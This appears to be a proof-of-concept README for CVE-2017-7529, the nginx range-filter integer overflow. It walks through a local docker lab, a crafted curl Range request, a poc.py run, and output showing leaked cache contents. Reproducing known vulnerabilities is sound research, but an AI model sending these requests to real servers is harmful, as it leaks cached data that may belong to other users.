Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. Source: https://nvd.nist.gov/vuln/detail/CVE-2017-7529
In other open sources you may find information that this vulnerability can only be reproduced with Apache2 and only with image files, but this is not the case. This vulnerability works with any application that is proxied through Nginx. The main thing is that the server returns the header Accept-Ranges: bytes
. It can be manually added to the nginx configuration: proxy_force_ranges on;
$ git clone https://github.com/SirEagIe/CVE-2017-7529
$ cd CVE-2017-7529
$ docker build -t cve-2017-7529 .
$ docker run --rm -d -p 8000:80 --name cve-2017-7529 cve-2017-7529
Send a GET request to obtain the Content-Length and store the response in the cache.
Resend the request with the Range header with the range -n,-(0x8000000000000000-n)
.
$ curl -i http://localhost:8000/
$ curl -i http://localhost:8000/ -r -533,-9223372036854775275 --output -
Or use poc.py script.
$ python3 poc.py http://localhost:8000/ 513
Result:
[+] Vulnerable to CVE-2017-7529
--00000000000000000029
Content-Type: text/html; charset=utf-8
Content-Range: bytes -513-19/20
MX*fÿÿÿÿÿÿÿÿõU*fTêû©h
KEY: httpGETlocalhost/
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 20
Server: Werkzeug/1.0.1 Python/3.5.3
Date: Thu, 25 Apr 2024 13:09:09 GMT
<p>Hello, World!</p>
--00000000000000000029
Content-Type: text/html; charset=utf-8
Content-Range: bytes -9223372036854775255-19/20